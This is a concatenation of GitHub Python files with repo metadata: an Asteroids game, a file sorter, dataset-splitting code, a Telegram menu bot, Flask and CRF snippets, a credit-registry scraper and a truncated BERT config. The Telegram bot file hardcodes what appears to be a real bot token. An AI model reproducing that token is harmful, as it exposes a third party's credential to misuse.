simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/explosion_alpha.png\")\n\n# sound assets purchased from sounddogs.com, please do not redistribute\n# .ogg versions of sounds are also available, just replace .mp3 by .ogg\n#soundtrack = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/soundtrack.mp3\")\nmissile_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/missile.mp3\")\nmissile_sound.set_volume(.5)\nship_thrust_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/thrust.mp3\")\nexplosion_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/explosion.mp3\")\n\n# alternative upbeat soundtrack by composer and former IIPP student Emiel Stopler\n# please do not redistribute without permission from Emiel at http://www.filmcomposer.nl\nsoundtrack = simplegui.load_sound(\"https://storage.googleapis.com/codeskulptor-assets/ricerocks_theme.mp3\")\n\n# helper functions\ndef angle_to_vector(ang):\n return [math.cos(ang), math.sin(ang)]\n\ndef dist(p, q):\n return math.sqrt((p[0] - q[0]) ** 2 + (p[1] - q[1]) ** 2)\n\ndef random_angle():\n return random.randrange(12) * math.pi / 6\n\ndef process_sprite_group(group, canvas):\n \"\"\"updates and draws every sprite in a set; removes sprite if appropriate (for missiles)\"\"\"\n remove_set = set([])\n for sprite in set(group):\n if sprite.update():\n remove_set.add(sprite)\n else:\n sprite.draw(canvas)\n group.difference_update(remove_set)\n \ndef group_collide(group, other_object):\n \"\"\"(returns True and removes other_object iff it has collided with any object in given group\"\"\"\n remove_set = set([])\n for object in set(group):\n if object.collide(other_object):\n remove_set.add(object)\n explosion_group.add(Sprite(object.get_position(), [0,0], 0, 0, explosion_image,\n explosion_info, explosion_sound))\n group.difference_update(remove_set)\n return len(remove_set) > 0\n\ndef group_group_collide(group1, group2):\n \"\"\"returns how many objects in group1 collided with an object in group2; removes collided objects\"\"\"\n counter = 0\n for object in set(group1):\n if group_collide(group2, object):\n counter += 1\n group1.discard(object)\n return counter\n\n\n# Ship class\nclass Ship:\n \n def __init__(self, pos, vel, angle, image, info):\n self.pos = [pos[0], pos[1]]\n self.vel = [vel[0], vel[1]]\n self.thrust = False\n self.angle = angle\n self.angle_vel = 0\n self.angle_vel_inc = 0.06\n self.forward = angle_to_vector(self.angle)\n self.missile_vel_scalar = 6\n self.image = image\n self.image_center = info.get_center()\n self.image_size = info.get_size()\n self.radius = info.get_radius()\n \n def get_position(self):\n return self.pos\n \n def get_radius(self):\n return self.radius\n \n def draw(self,canvas):\n if self.thrust:\n canvas.draw_image(self.image, [self.image_center[0] + self.image_size[0],\n self.image_center[1]],\n self.image_size, self.pos, self.image_size, self.angle)\n else:\n canvas.draw_image(self.image, self.image_center, self.image_size,\n self.pos, self.image_size, self.angle)\n \n def update(self):\n # update angle and forward vector\n self.angle = (self.angle + self.angle_vel) % (2 * math.pi)\n self.forward = angle_to_vector(self.angle)\n \n # update position\n for i in range(len(self.pos)):\n self.pos[i] = (self.pos[i] + self.vel[i]) % FRAME[i]\n\n # update velocity\n for i in range(len(self.vel)):\n if self.thrust:\n self.vel[i] += self.forward[i] * 0.1\n self.vel[i] *= 0.99 \n \n def toggle_thrust(self):\n self.thrust = not self.thrust\n if self.thrust:\n ship_thrust_sound.play()\n else:\n ship_thrust_sound.rewind()\n\n def increment_angle_vel(self):\n self.angle_vel += self.angle_vel_inc\n \n def decrement_angle_vel(self):\n self.angle_vel -= self.angle_vel_inc \n \n def shoot(self):\n global missile_group\n missile_pos = [self.pos[0] + self.radius * self.forward[0],\n self.pos[1] + self.radius * self.forward[1]]\n missile_vel = [self.vel[0] + self.missile_vel_scalar * self.forward[0],\n self.vel[1] + self.missile_vel_scalar * self.forward[1]]\n missile_group.add(Sprite(missile_pos, missile_vel, self.angle, 0, missile_image, missile_info, missile_sound))\n \n\n# Sprite class\nclass Sprite:\n def __init__(self, pos, vel, ang, ang_vel, image, info, sound = None):\n self.pos = [pos[0],pos[1]]\n self.vel = [vel[0],vel[1]]\n self.angle = ang\n self.angle_vel = ang_vel\n self.image = image\n self.image_center = info.get_center()\n self.image_size = info.get_size()\n self.radius = info.get_radius()\n self.lifespan = info.get_lifespan()\n self.animated = info.get_animated()\n self.age = 0\n if sound:\n sound.rewind()\n sound.play()\n \n def get_position(self):\n return self.pos\n \n def get_radius(self):\n return self.radius\n \n def collide(self, other_object):\n return dist(self.pos, other_object.get_position()) < self.radius + other_object.get_radius()\n \n def draw(self, canvas):\n if self.animated:\n current_index = self.age // 2\n canvas.draw_image(self.image, [self.image_center[0] + current_index * self.image_size[0],\n self.image_center[1]],\n self.image_size, self.pos, self.image_size)\n else:\n canvas.draw_image(self.image, self.image_center, self.image_size,\n self.pos, self.image_size, self.angle)\n \n def update(self):\n # update angle\n self.angle = (self.angle + self.angle_vel) % (2 * math.pi)\n \n # update position\n for i in range(len(self.pos)):\n self.pos[i] = (self.pos[i] + self.vel[i]) % FRAME[i]\n \n # for missiles & explosions; updates sprite age; function returns True if age exceeds lifespan\n self.age += 1\n return self.age > self.lifespan\n \n#keyup and keydown handlers\ndef keydown(key):\n for i in inputs_down:\n if key == simplegui.KEY_MAP[i]:\n inputs_down[i]()\n \ndef keyup(key):\n for i in inputs_up:\n if key == simplegui.KEY_MAP[i]:\n inputs_up[i]()\n\n# mouseclick handlers that reset UI and conditions whether splash image is drawn\ndef click(pos):\n global started, lives, score, max_rocks\n center = [WIDTH / 2, HEIGHT / 2]\n size = splash_info.get_size()\n inwidth = (center[0] - size[0] / 2) < pos[0] < (center[0] + size[0] / 2)\n inheight = (center[1] - size[1] / 2) < pos[1] < (center[1] + size[1] / 2)\n if (not started) and inwidth and inheight:\n started = True\n lives = STARTING_LIVES\n score = 0\n soundtrack.rewind()\n soundtrack.play()\n \n\ndef sound_timer_handler():\n \"\"\"Pauses the music if the frame is closed (by comparing count variables)\"\"\"\n global sound_count1\n sound_count1 = (sound_count1 + 1) % 1000\n if sound_count1 - sound_count2 > 1 and sound_count2 < 999:\n soundtrack.pause()\n \n#DRAW HANDLER\ndef draw(canvas):\n global time, lives, score, started, rock_group, min_rock_vel, max_rock_vel, rock_vel_range, sound_count2\n \n #keep these variables equal until the frame is closed\n sound_count2 = sound_count1\n \n # animate background\n time += 1\n wtime = (time / 4) % WIDTH\n center = debris_info.get_center()\n size = debris_info.get_size()\n canvas.draw_image(nebula_image, nebula_info.get_center(), nebula_info.get_size(), [WIDTH / 2, HEIGHT / 2], [WIDTH, HEIGHT])\n canvas.draw_image(debris_image, center, size, (wtime - WIDTH / 2, HEIGHT / 2), (WIDTH, HEIGHT))\n canvas.draw_image(debris_image, center, size, (wtime + WIDTH / 2, HEIGHT / 2), (WIDTH, HEIGHT))\n \n # draw UI\n canvas.draw_text(\"Lives: \" + str(lives), [WIDTH * 0.05, HEIGHT * 0.08], 32, \"white\")\n canvas.draw_text(\"score: \" + str(score), [WIDTH * 0.8, HEIGHT * 0.08], 32, \"white\")\n \n # draw and update ship and sprites\n my_ship.draw(canvas)\n my_ship.update()\n process_sprite_group(rock_group, canvas)\n process_sprite_group(missile_group, canvas)\n process_sprite_group(explosion_group, canvas)\n\n # check for collisions and update lives, score, and max rock velocity accordingly\n if group_collide(rock_group, my_ship):\n lives -= 1\n score += group_group_collide(missile_group, rock_group)\n min_rock_vel = -0.5 - (score * 0.03)\n max_rock_vel = 0.5 + (score * 0.03)\n rock_vel_range = max_rock_vel - min_rock_vel\n \n # Game Over\n if lives == 0:\n started = False\n rock_group = set([])\n soundtrack.pause()\n \n # draw splash screen if not started\n if not started:\n canvas.draw_image(splash_image, splash_info.get_center(), \n splash_info.get_size(), [WIDTH / 2, HEIGHT / 2], \n splash_info.get_size())\n \n# timer handler that spawns a rock; rock doesn't spawn if too close to ship\ndef rock_spawner():\n rock_pos = [random.randrange(WIDTH), random.randrange(HEIGHT)]\n rock_vel = [random.random() * rock_vel_range + min_rock_vel,\n random.random() * rock_vel_range + min_rock_vel]\n rock_ang_vel = random.random() * 0.05 - 0.025\n if ((len(rock_group) < MAX_ROCKS) and started and rock_ang_vel\n and (dist(rock_pos, my_ship.get_position()) >= my_ship.get_radius() * SAFE_RADIUS_SCALAR)):\n rock_group.add(Sprite(rock_pos, rock_vel, random_angle(), rock_ang_vel,\n asteroid_image, asteroid_info))\n \n# initialize frame\nframe = simplegui.create_frame(\"Asteroids\", WIDTH, HEIGHT)\n\n# initialize ship and empty sprite groups\nmy_ship = Ship([WIDTH / 2, HEIGHT / 2], [0, 0], random_angle(), ship_image, ship_info)\nrock_group = set([])\nmissile_group = set([])\nexplosion_group = set([])\n\n#dictionaries for keyup and keydown handlers\ninputs_down = {\"left\": my_ship.decrement_angle_vel,\n \"right\": my_ship.increment_angle_vel,\n \"up\": my_ship.toggle_thrust, \"space\": my_ship.shoot}\n\ninputs_up = {\"left\": my_ship.increment_angle_vel,\n \"right\": my_ship.decrement_angle_vel,\n \"up\": my_ship.toggle_thrust}\n\n# register handlers\nframe.set_keyup_handler(keyup)\nframe.set_keydown_handler(keydown)\nframe.set_mouseclick_handler(click)\nframe.set_draw_handler(draw)\n\ntimer = simplegui.create_timer(1000.0, rock_spawner)\nsound_timer = simplegui.create_timer(100.0, sound_timer_handler)\n\n# get things rolling\ntimer.start()\nsound_timer.start()\nframe.start()\n","repo_name":"jaredcooney/OSSU-Computer-Science","sub_path":"Fundamentals of Computing specialization/Course 1: An Introduction to Interactive Programming in Python/Week 7 & 8: Asteroids clone.py","file_name":"Week 7 & 8: Asteroids clone.py","file_ext":"py","file_size_in_byte":14139,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"17718231717","text":"from threading import Thread, RLock\nfrom shutil import copyfile\nfrom pathlib import Path\nimport re\nimport logging\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"The program sorts your folder by folder depending on the file extension\")\nparser.add_argument('-s', '--source', help=\"Source folder\", required=True)\nparser.add_argument('-o', '--output', default='Sorted_file')\nargs = vars(parser.parse_args())\noutput_folder = Path(args.get('output'))\nstart_folder = Path(args.get('source'))\n\nfolders = []\n\n\ndef normalize(name):\n \"\"\"Функція робить транслітерацію строки\"\"\"\n CYRILLIC_SYMBOLS = \"абвгдеёжзийклмнопрстуфхцчшщъыьэюяєіїґ\"\n TRANSLATION = (\"a\", \"b\", \"v\", \"g\", \"d\", \"e\", \"e\", \"j\", \"z\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"r\", \"s\", \"t\", \"u\",\n \"f\", \"h\", \"ts\", \"ch\", \"sh\", \"sch\", \"\", \"y\", \"\", \"e\", \"yu\", \"ya\", \"je\", \"i\", \"ji\", \"g\")\n\n TRANS = {}\n\n for c, t in zip(CYRILLIC_SYMBOLS, TRANSLATION):\n TRANS[ord(c)] = t\n TRANS[ord(c.upper())] = t.upper()\n\n return re.sub(r'\\W', '_', name.translate(TRANS))\n\n\ndef normalize_file(file):\n \"\"\"Функція виконує транслітерацію файлу\"\"\"\n title, extension = Path(file).name, Path(file).suffix\n return normalize(re.sub(extension, '', title)) + extension\n\n\ndef find_right_folder(extension):\n \"\"\"Функція повертає папку відповідно до розширення файлу\"\"\"\n TYPES = {\n \"imeges\": [\"JPEG\", \"PNG\", \"JPG\", \"SVG\"],\n \"video\": [\"AVI\", \"MP4\", \"MOV\", \"MKV\"],\n \"documents\": [\"DOC\", \"DOCX\", \"TXT\", \"PDF\", \"XLSX\", \"PPTX\"],\n \"audio\": [\"MP3\", \"OGG\", \"WAV\", \"AMR\"],\n \"archives\": [\"ZIP\", \"GZ\", \"TAR\"]\n }\n for key, value in TYPES.items():\n for val in value:\n if val == extension or val == extension.upper():\n return key\n return \"other\"\n\n\ndef folder_search(path: Path):\n \"\"\"Функція виконує пошук всіх папок в папці\"\"\"\n for el in path.iterdir():\n if el.is_dir():\n folders.append(el)\n folder_search(el)\n\n\ndef sort_file(path: Path):\n \"\"\"Функція копіює файли в нову папку відповідно до типу файлу\"\"\"\n for el in path.iterdir():\n if el.is_file():\n extension = el.suffix[1:]\n new_folder = output_folder/find_right_folder(extension)\n try:\n new_folder.mkdir(exist_ok=True, parents=True)\n copyfile(el, new_folder / normalize_file(el.name))\n\n except OSError as e:\n logging.error(e)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG, format=\"%(threadName)s %(message)s\")\n\n folders.append(start_folder)\n folder_search(start_folder)\n threads = []\n for folder in folders:\n th = Thread(target=sort_file, args=(folder, ))\n th.start()\n threads.append(th)\n\n [th.join() for th in threads]\n print(f\"Finished, you can delete {start_folder} folder\")\n","repo_name":"armandabasi/go-it-web-hw3","sub_path":"threading/cleaner.py","file_name":"cleaner.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10093682187","text":"import shutil\nimport os\nfrom torch.utils.data import DataLoader\nfrom util.utils import *\nfrom dataset.ImageFolder import ImageFolder\nfrom PIL import Image\n\n'''\nNum of Class : 11\nclasses = ['change_gear',\n 'drinking',\n 'hair_and_makeup',\n 'phonecall_left', ---> 'phonecall'\n 'phonecall_right', ---> 'phonecall'\n 'radio',\n 'reach_backseat',\n 'reach_side',\n 'safe_drive',\n 'standstill_or_waiting',\n 'talking_to_passenger',\n 'texting_left', ---> 'texting'\n 'texting_right', ---> 'texting'\n 'unclassified' ---> deprecated\n ]\n\n1) 'phonecall_left' and 'phonecall_right' are combined as phonecall\n2) 'texting_left' and 'texting_right' are combined as texting\n3) 'unclassified' is not considered as a single class\n'''\n\ndef DMD_deployment(args):\n '''\n Similar to DMD.\n However, this dataset is for deployment only with DMD dataset.\n Therefore, subject #1 used for test in 'DMD' is further divided into train/test dataset for deployment.\n Other subjects are not accessible while deployment. \n '''\n train_TF = get_transform('train')\n test_TF = get_transform('test')\n '''\n data shape : [bsz,depth,height,width]\n '''\n divide_subject_by_ratio(args,test_subject = args.test_subject)\n train_dataset = ImageFolder(root = '/data/DMD-Driver-Monitoring-Dataset/train_DMD_deployment', transform = train_TF)\n val_dataset = ImageFolder(root = '/data/DMD-Driver-Monitoring-Dataset/test_DMD_deployment', transform = test_TF)\n test_dataset = ImageFolder(root = '/data/DMD-Driver-Monitoring-Dataset/test_DMD_deployment', transform = test_TF)\n\n train_dataloader = DataLoader(train_dataset, batch_size = args.batch_size, shuffle = True, num_workers = 16)\n val_dataloader = DataLoader(val_dataset, batch_size = args.batch_size, shuffle = True, num_workers = 16)\n test_dataloader = DataLoader(test_dataset, batch_size = args.batch_size, shuffle = False, num_workers = 16)\n return train_dataloader, val_dataloader, test_dataloader\n\n\ndef divide_subject_by_ratio(args,test_subject = 1):\n '''\n divide subject into train/test (4:1).\n all body images are saved in \n\n file_name = [path,file_name]\n file_info = ['body',{time},{subject},{interval count},{frame count}]\n '''\n path = '/data/DMD-Driver-Monitoring-Dataset/'\n train_imgs_list = []\n test_imgs_list = []\n\n # Read .txt file\n file = open('/data/DMD-Driver-Monitoring-Dataset/body_imgs_list.txt','r')\n body_string = file.read()\n file.close()\n\n # Extracts the file which include 'driver actions' in file name\n body_file_list = body_string.split('\\n')\n for path_file_name in body_file_list:\n if 'driver_actions' in path_file_name:\n file_name = path_file_name.split('/')[-1]\n file_info = file_name.split('_')\n if int(file_info[2])==test_subject:\n test_imgs_list.append(path_file_name)\n else:\n train_imgs_list.append(path_file_name)\n if args.dataset!='DMD_deployment':\n if os.path.isfile(path+'check_subject.txt'):\n check_subject = open(path+'check_subject.txt','r')\n subject_num = check_subject.read()\n check_subject.close()\n if int(subject_num) != test_subject:\n if os.path.exists(path+'train_DMD_deployment/'):\n shutil.rmtree(path+'train_DMD_deployment/')\n if os.path.exists(path+'test_DMD_deployment/'):\n shutil.rmtree(path+'test_DMD_deployment/')\n check_subject = open(path+'check_subject.txt','w')\n check_subject.write(str(test_subject))\n check_subject.close()\n else:\n return 0\n else:\n check_subject = open(path+'check_subject.txt','w')\n check_subject.write(str(test_subject))\n check_subject.close()\n \n imgs_list_dict = {}\n for file in test_imgs_list:\n file_label = file.split('/')[-2]\n # merge labels\n if file_label in ['phonecall_left','phonecall_right']:\n file_label = 'phonecall'\n if file_label in ['texting_left','texting_right']:\n file_label = 'texting'\n if file_label in ['unclassified']:\n continue\n if file_label in imgs_list_dict:\n imgs_list_dict[file_label].append(file)\n else:\n imgs_list_dict[file_label] = [file]\n \n for label in imgs_list_dict:\n train_set = imgs_list_dict[label][:int(0.8*len(imgs_list_dict[label]))]\n test_set = imgs_list_dict[label][int(0.8*len(imgs_list_dict[label])):]\n if not os.path.exists(path+'/train_DMD_deployment/'+label):\n os.makedirs(path+'/train_DMD_deployment/'+label)\n for train_data in train_set:\n shutil.copy(train_data,path+'/train_DMD_deployment/'+label)\n if not os.path.exists(path+'/test_DMD_deployment/'+label):\n os.makedirs(path+'/test_DMD_deployment/'+label)\n for test_data in test_set:\n shutil.copy(test_data,path+'/test_DMD_deployment/'+label)\n if not os.path.exists(path+'/train_DMD_deployment/standstill_or_waiting'):\n os.makedirs(path+'/train_DMD_deployment/standstill_or_waiting')\n if not os.path.exists(path+'/test_DMD_deployment/standstill_or_waiting'):\n os.makedirs(path+'/test_DMD_deployment/standstill_or_waiting')","repo_name":"LJY-HY/DMD","sub_path":"dataset/build_DMD_deployment.py","file_name":"build_DMD_deployment.py","file_ext":"py","file_size_in_byte":5541,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"40987511904","text":"from telegram.ext import *\nfrom telegram import *\n\nTOKEN = \"5835529587:AAEnoYniWd8LjGJFsP47xq5_QnI9OIoSe3c\"\n\nSTART, END = 0,1\nONE, TWO, THREE = range(3)\n\nasync def start_bot(update: Update, context= ContextTypes.DEFAULT_TYPE) -> int:\n await context.bot.send_message(chat_id=update.effective_chat.id, text=\"Hey, itz-a-me examples\")\n\n\nasync def start_conversation(update: Update, context= ContextTypes.DEFAULT_TYPE) -> int:\n text = \"Please Choose\"\n #this is 1\n keyboard = [\n [InlineKeyboardButton(\"1.1\", callback_data=str(ONE))],\n [InlineKeyboardButton(\"END\", callback_data=str(END))]\n ]\n\n await update.message.reply_text(text= text, reply_markup=InlineKeyboardMarkup(keyboard))\n\n return START\n\nasync def stage_one(update: Update, context: ContextTypes.DEFAULT_TYPE) -> int:\n query = update.callback_query\n await query.answer()\n # this is 1.1\n text = \"BASE 1.1\"\n\n keyboard = [\n [InlineKeyboardButton(\"1.1.1 \", callback_data=str(TWO))],\n [InlineKeyboardButton(\"1.1.2\", callback_data=str(THREE))],\n # [InlineKeyboardButton(\"END\", callback_data=str(END))]\n ]\n\n reply_markup = InlineKeyboardMarkup(keyboard)\n await query.edit_message_text(text= text, reply_markup=reply_markup)\n\n return START\n\nasync def stage_one_one(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n query = update.callback_query\n await query.answer()\n # this is 1.1\n text = \"BASE 1.1.1\"\n\n keyboard = [\n [InlineKeyboardButton(\"OPTION TEMP FOR 1.1.1 \", callback_data=str(TWO))],\n [InlineKeyboardButton(\"END\", callback_data=str(END))]\n ]\n\n reply_markup = InlineKeyboardMarkup(keyboard)\n await query.edit_message_text(text= text, reply_markup=reply_markup)\n\n return START\n\nasync def stage_one_two(update: Update, context: ContextTypes.DEFAULT_TYPE) -> int:\n query = update.callback_query\n await query.answer()\n # this is 1.1\n text = \"BASE 1.1.2\"\n\n keyboard = [\n [InlineKeyboardButton(\"START BUT THIS IS 1.1.2 \", callback_data=str(ONE))],\n [InlineKeyboardButton(\"END\", callback_data=str(END))]\n ]\n\n reply_markup = InlineKeyboardMarkup(keyboard)\n await query.edit_message_text(text= text, reply_markup=reply_markup)\n\n return END\n\nasync def end(update: Update, context: ContextTypes.DEFAULT_TYPE) -> int:\n query = update.callback_query\n await query.answer()\n await query.edit_message_text(text=\"See you next time!\")\n return ConversationHandler.END\n\ndef main():\n application = Application.builder().token(TOKEN).build()\n application.add_handler(CommandHandler(\"start\", start_bot))\n\n conversation_handler = ConversationHandler(\n entry_points=[MessageHandler(filters.TEXT, start_conversation)],\n states={\n START : [\n CallbackQueryHandler(stage_one, pattern=\"^\"+str(ONE)+\"$\"),\n CallbackQueryHandler(stage_one_one, pattern=\"^\"+str(TWO)+\"$\"),\n CallbackQueryHandler(stage_one_two, pattern=\"^\"+str(THREE)+\"$\")\n ],\n END : [CallbackQueryHandler(end, pattern=\"^\"+str(END)+\"$\")]\n },\n fallbacks=[CommandHandler(\"start\", start_bot)]\n )\n application.add_handler(conversation_handler)\n application.run_polling()\nmain()","repo_name":"ayushxpatne/cafe-decider-bot-nagpur","sub_path":"examples/exampleInline.py","file_name":"exampleInline.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17706325776","text":"from flask import Flask, render_template, request, jsonify\nfrom flask_restful import Resource, Api, reqparse\nimport logging\nimport sys\nsys.stdout.flush()\napp = Flask(__name__, static_url_path='')\napi = Api(app)\nparser = reqparse.RequestParser()\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n#\n# @app.route('/api/scrapeUrl', methods=['POST'])\n# def scrapeUrl():\n# app.logger.info(request.json)\n\n@app.route('/api/scrapeUrl', methods=['POST'])\ndef scrapeUrl():\n json_data = request.__dict__\n app.logger.info(json_data)\n return {'hello': 'world'}\n\n# class HelloWorld(Resource):\n# def get(self):\n# return {'hello': 'world'}\n# def post(self):\n# json_data = request.get_json()\n# #args = parser.parse_args()\n# app.logger.info(json_data)\n# return {'hello': 'world'} #json_data\n#\n# api.add_resource(HelloWorld, '/api/scrapeUrl')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n#!flask/bin/python\n# from flask import Flask, render_template, request\n# import logging\n#\n# app = Flask(__name__)\n#\n# @app.route('/')\n# def index():\n# return render_template('index.html')\n#\n# @app.route('/api/scrapeUrl', methods=['POST'])\n# def create_task():\n# app.logger.info(request)\n#\n# if __name__ == '__main__':\n# app.run(debug=True)\n\n\n# from flask import Flask, render_template\n#\n# app = Flask(__name__)\n#\n# @app.route('/')\n# def index():\n# return render_template('index.html')\n#\n# if __name__ == '__main__':\n# app.run(debug=True)\n","repo_name":"adityasan92/videre","sub_path":"server/public/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72486900882","text":"import math\n\ndef solve9():\n trips = gentriples()\n for p in trips:\n a, b, c = p\n if a + b + c == 1000:\n return a * b * c\n\ndef gentriples():\n \"\"\"\n An efficient(?) generator for pythagorean triples\n \"\"\"\n triples = set()\n a = 2\n while True:\n for b in range(a, math.floor((a**2 - 1) / 2) + 1):\n c = math.sqrt(a**2 + b**2)\n trip = (a, b, int(c))\n if c % 1 == 0 and (trip not in triples):\n triples.add(trip)\n yield trip\n a += 1\n\nif __name__ == \"__main__\":\n print(solve9())\n","repo_name":"anlsh/euler","sub_path":"1to50/p9.py","file_name":"p9.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72467279120","text":"product = {\"name_of\": \"Victor\",\n \"all_of\" : [{\"human_1\": \"Victor\", \"human_2\": \"Joshua\", \"human_3\": \"Micah\",\n \"animal_1\": \"Dog\", \"animal_3\": \"Donkey\", \"animal_4\": \"Lion\"}, \n {\"human_7\": \"Loise\", \"human_10\": \"Queen\", \"animal_17\": \"Zebra\", \"animal_23\": \"Giraffe\"}]}\n\nfor item in product[\"all_of\"]:\n if \"Donkey\" in item.values():\n print(\"You already got this nah\")\n\n\n# allof = {inst : product[\"all_of\"][inst] for inst in product[\"all_of\"] if inst.startswith(\"animal\")}\n# print(allof)\n\nprice = int(1000)\nquantity = 2.5\ntotal = int(price * quantity)\nprint(total)\n\n# price_str = str(price)\n# rev_price = price_str[::-1]\n\n# if len(price_str) > 3:\n# for i, val in enumerate(rev_price):\n# hum_price += val\n# if (i + 1) % 3 == 0 and i != len(rev_price) - 1:\n# hum_price += \",\"\n\n# print(hum_price[::-1])\n\nnum1 = 16\nnum2 = 4\n\n\nprint(num1 % num2)\n\n\n","repo_name":"vickerdent/shop-central","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4064138651","text":"from sklearn_crfsuite import CRF\n\nfrom .util import sent2features\n\n\nclass CRFModel(object):\n def __init__(self,\n algorithm='lbfgs',\n c1=0.1,\n c2=0.1,\n max_iterations=100,\n all_possible_transitions=False\n ):\n\n self.model = CRF(algorithm=algorithm,\n c1=c1,\n c2=c2,\n max_iterations=max_iterations,\n all_possible_transitions=all_possible_transitions)\n\n def train(self, sentences, tag_lists):\n features = [sent2features(s) for s in sentences]\n self.model.fit(features, tag_lists)\n\n def test(self, sentences):\n features = [sent2features(s) for s in sentences]\n pred_tag_lists = self.model.predict(features)\n return pred_tag_lists\n","repo_name":"luopeixiang/named_entity_recognition","sub_path":"models/crf.py","file_name":"crf.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":1935,"dataset":"github-code","pt":"3"} +{"seq_id":"2394512212","text":"# 信用中国\nimport threading\nfrom CH_Request.util.reqContent import reqContent\n\nclass getCreditChina(threading.Thread):\n\n def __init__(self,comName):\n threading.Thread.__init__(self)\n print(\"启动信用中国爬取程序\")\n self.comName = comName\n self.header = {\n \"Host\":\"public.creditchina.gov.cn\",\n \"Connection\":\"Connection\",\n \"Accept\":\"application/json, text/javascript, */*; q=0.01\",\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/87.0.4280.141 Safari/537.36\",\n \"Origin\":\"https://www.creditchina.gov.cn\",\n \"Referer\":\"https://www.creditchina.gov.cn\",\n \"Accept-Encoding\":\"gzip, deflate, br\",\n \"Accept-Language\":\"zh-CN,zh;q=0.9\",\n }\n\n\n def getuuid(self):\n url = \"https://public.creditchina.gov.cn/private-api/catalogSearchHome\"\n payload = {\n \"keyword\": \"{}\".format(self.comName),\n \"scenes\": \"defaultScenario\",\n \"tableName\": \"credit_xyzx_tyshxydm\",\n \"searchState\": \"2\",\n }\n res = reqContent(url=url,headers=self.header,payload=payload)\n if res.get(\"message\") == \"成功\" or res.get(\"status\") == 1:\n dataList = res.get(\"data\").get(\"list\")\n for i in dataList:\n accurate_entity_name = i.get(\"accurate_entity_name\")\n if accurate_entity_name != self.comName:\n print(\"获取uuid时获取到的公司名与输入公司名不符!\")\n else:\n uuid = i.get(\"uuid\")\n return uuid\n else:\n print(\"获取uuid时出现错误\")\n\n def getDataTypeCount(self):\n \"\"\"\n 获取数据类型数量\n :return:\n \"\"\"\n url = \"https://public.creditchina.gov.cn/private-api/searchDateTypeCount\"\n payload = {\n \"entityType\":\"1\",\n \"searchState\":\"1\",\n \"keyword\":self.comName,\n }\n res = reqContent(url=url,headers=self.header,payload=payload)\n if res.get(\"message\") == \"成功\" or res.get(\"status\") == 1:\n dataDict = res.get(\"data\")\n for key in dataDict.keys():\n nums = dataDict.get(key)\n if nums != 0:\n print(\"{}:{}的数量为{}\".format(self.comName,key,nums))\n self.getDataSource(type=key)\n else:\n print(\"{}:{}的数量为0\".format(self.comName,key))\n else:\n print(\"获取类别数量时出现错误\")\n\n\n def getDataSource(self,type):\n url = \"https://public.creditchina.gov.cn/private-api/typeSourceSearch\"\n payload = {\n \"type\":type,\n \"keyword\":self.comName,\n \"searchState\":\"1\",\n \"entityType\":\"1\",\n \"scenes\":\"defaultscenario\",\n \"page\":\"1\",\n \"pageSize\":\"100\",\n }\n res = reqContent(url=url,headers=self.header,payload=payload)\n if res.get(\"message\") == \"成功\" or res.get(\"status\") == 1:\n dataList = res.get(\"data\").get(\"list\")\n # print(dataList)\n for i in dataList:\n columnList = i.get('columnList')\n for k in columnList:\n\n print(i.get(\"entity\").get(k))\n print(\"=\"*50)\n else:\n print(\"获取{}中{}时发生异常\".format(self.comName,type))\n print(\"信用中国程序结束\")\n\n\n def run(self):\n self.getDataTypeCount()","repo_name":"MeowJ0122/CH_Crawler","sub_path":"CH_Request/function/getCreditChina.py","file_name":"getCreditChina.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71649858323","text":"import tensorflow as tf\nimport numpy as np\nfrom sklearn import metrics\n# from . import bert_model as modeling\nfrom bert import run_classifier, optimization, tokenization, modeling\n\nclass BertConfig(object):\n dev_sample_percentage = 0.05\n data_file = \"data/train_data.txt\"\n test_file = \"data/test_data.txt\"\n model_dir = 'bert'\n vocab_dir = 'data/vocab.pickle'\n embedding_size = 64\n seq_len = 100\n size_layer = 128\n num_layers = 2\n num_classes = 20\n learning_rate = 0.001\n\n batch_size = 100\n num_epochs = 5\n evaluate_every = 10\n checkpoint_every = 10\n num_checkpoints = 5\n allow_soft_placement = True\n log_device_placement = True\n\n BERT_VOCAB = '../chinese_L-12_H-768_A-12/vocab.txt'\n BERT_INIT_CHKPNT = '../chinese_L-12_H-768_A-12/bert_model.ckpt'\n BERT_CONFIG = '../chinese_L-12_H-768_A-12/bert_config.json'\n\ndef create_model(\n bert_config,\n is_training,\n input_ids,\n input_mask,\n segment_ids,\n labels,\n num_labels,\n use_one_hot_embeddings,\n reuse_flag = 